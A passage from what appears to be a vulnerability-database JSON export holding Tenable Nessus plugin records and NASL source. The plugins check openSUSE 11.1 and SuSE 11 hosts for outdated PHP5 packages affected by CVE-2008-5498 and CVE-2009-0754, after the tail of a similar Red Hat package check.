rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.22.15\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T14:04:12", "description": "php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754).", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : apache2-mod_php5 (apache2-mod_php5-593)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-dbase", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tokenizer", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-ncurses", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-hash", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-ldap"], "id": "SUSE_11_1_APACHE2-MOD_PHP5-090312.NASL", "href": "https://www.tenable.com/plugins/nessus/40187", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-mod_php5-593.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40187);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_php5 (apache2-mod_php5-593)\");\n script_summary(english:\"Check for the apache2-mod_php5-593 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=471419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=480948\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_php5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"apache2-mod_php5-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-bcmath-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-bz2-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-calendar-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ctype-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-curl-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-dba-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-dbase-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-devel-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-dom-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-exif-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-fastcgi-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ftp-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-gd-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-gettext-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-gmp-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-hash-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-iconv-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-imap-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-json-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ldap-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-mbstring-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-mcrypt-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-mysql-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-ncurses-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-odbc-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-openssl-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pcntl-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pdo-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pear-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pgsql-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-posix-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-pspell-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-readline-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-shmop-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-snmp-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-soap-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sockets-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sqlite-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-suhosin-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sysvmsg-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sysvsem-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-sysvshm-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-tidy-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-tokenizer-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-wddx-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xmlreader-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xmlrpc-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xmlwriter-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-xsl-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-zip-5.2.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"php5-zlib-5.2.9-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / php5 / php5-bcmath / php5-bz2 / php5-calendar / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T14:09:52", "description": "php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory. (CVE-2008-5498)\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754)", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : PHP5 (SAT Patch Number 666)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "modified": "2009-09-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:php5-mysql", "p-cpe:/a:novell:suse_linux:11:php5-bcmath", "p-cpe:/a:novell:suse_linux:11:php5-json", "p-cpe:/a:novell:suse_linux:11:php5-zlib", "p-cpe:/a:novell:suse_linux:11:php5-dbase", "p-cpe:/a:novell:suse_linux:11:php5-soap", "p-cpe:/a:novell:suse_linux:11:php5-pgsql", "p-cpe:/a:novell:suse_linux:11:php5-bz2", "p-cpe:/a:novell:suse_linux:11:php5-gd", "p-cpe:/a:novell:suse_linux:11:php5-suhosin", "p-cpe:/a:novell:suse_linux:11:php5-mcrypt", "p-cpe:/a:novell:suse_linux:11:php5-dom", "p-cpe:/a:novell:suse_linux:11:php5-sysvshm", "p-cpe:/a:novell:suse_linux:11:php5-gmp", "p-cpe:/a:novell:suse_linux:11:php5-pdo", "p-cpe:/a:novell:suse_linux:11:php5-fastcgi", "p-cpe:/a:novell:suse_linux:11:php5-ldap", "p-cpe:/a:novell:suse_linux:11:php5-mbstring", "p-cpe:/a:novell:suse_linux:11:php5-odbc", "p-cpe:/a:novell:suse_linux:11:php5-dba", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:php5-openssl", "p-cpe:/a:novell:suse_linux:11:php5-tokenizer", "p-cpe:/a:novell:suse_linux:11:php5-pspell", "p-cpe:/a:novell:suse_linux:11:php5-zip", "p-cpe:/a:novell:suse_linux:11:php5-gettext", "p-cpe:/a:novell:suse_linux:11:php5-ctype", "p-cpe:/a:novell:suse_linux:11:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:11:php5", "p-cpe:/a:novell:suse_linux:11:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:11:php5-snmp", "p-cpe:/a:novell:suse_linux:11:php5-wddx", "p-cpe:/a:novell:suse_linux:11:php5-pcntl", "p-cpe:/a:novell:suse_linux:11:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:11:php5-hash", "p-cpe:/a:novell:suse_linux:11:php5-exif", "p-cpe:/a:novell:suse_linux:11:php5-sysvsem", "p-cpe:/a:novell:suse_linux:11:php5-pear", "p-cpe:/a:novell:suse_linux:11:php5-calendar", "p-cpe:/a:novell:suse_linux:11:php5-xsl", "p-cpe:/a:novell:suse_linux:11:php5-curl", "p-cpe:/a:novell:suse_linux:11:php5-xmlreader", "p-cpe:/a:novell:suse_linux:11:php5-shmop", "p-cpe:/a:novell:suse_linux:11:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:11:php5-iconv", "p-cpe:/a:novell:suse_linux:11:php5-ftp"], "id": "SUSE_11_APACHE2-MOD_PHP5-090319.NASL", "href": "https://www.tenable.com/plugins/nessus/41368", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41368);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n\n script_name(english:\"SuSE 11 Security Update : PHP5 (SAT Patch Number 666)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory. (CVE-2008-5498)\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=471419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=480948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5498.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0754.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 666.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", 